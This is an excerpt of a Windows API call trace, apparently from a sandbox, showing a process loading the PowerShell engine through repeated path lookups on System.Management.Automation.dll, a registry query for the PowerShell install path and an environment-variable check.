	[0568.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.401] GetCurrentProcessId () returned 0xd70
	[0568.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.406] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8d8 | out: phkResult=0x1cd8d8*=0x380) returned 0x0
	[0568.406] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd85c, lpData=0x0, lpcbData=0x1cd858*=0x0 | out: lpType=0x1cd85c*=0x1, lpData=0x0, lpcbData=0x1cd858*=0x56) returned 0x0
	[0568.406] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b7d50
	[0568.406] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd82c, lpData=0x1b7b7d50, lpcbData=0x1cd828*=0x56 | out: lpType=0x1cd82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd828*=0x56) returned 0x0
	[0568.406] CoTaskMemFree (pv=0x1b7b7d50) 
	[0568.406] RegCloseKey (hKey=0x380) returned 0x0
	[0568.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.415] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0568.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.415] CoTaskMemFree (pv=0x3e2be0) 
	[0568.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
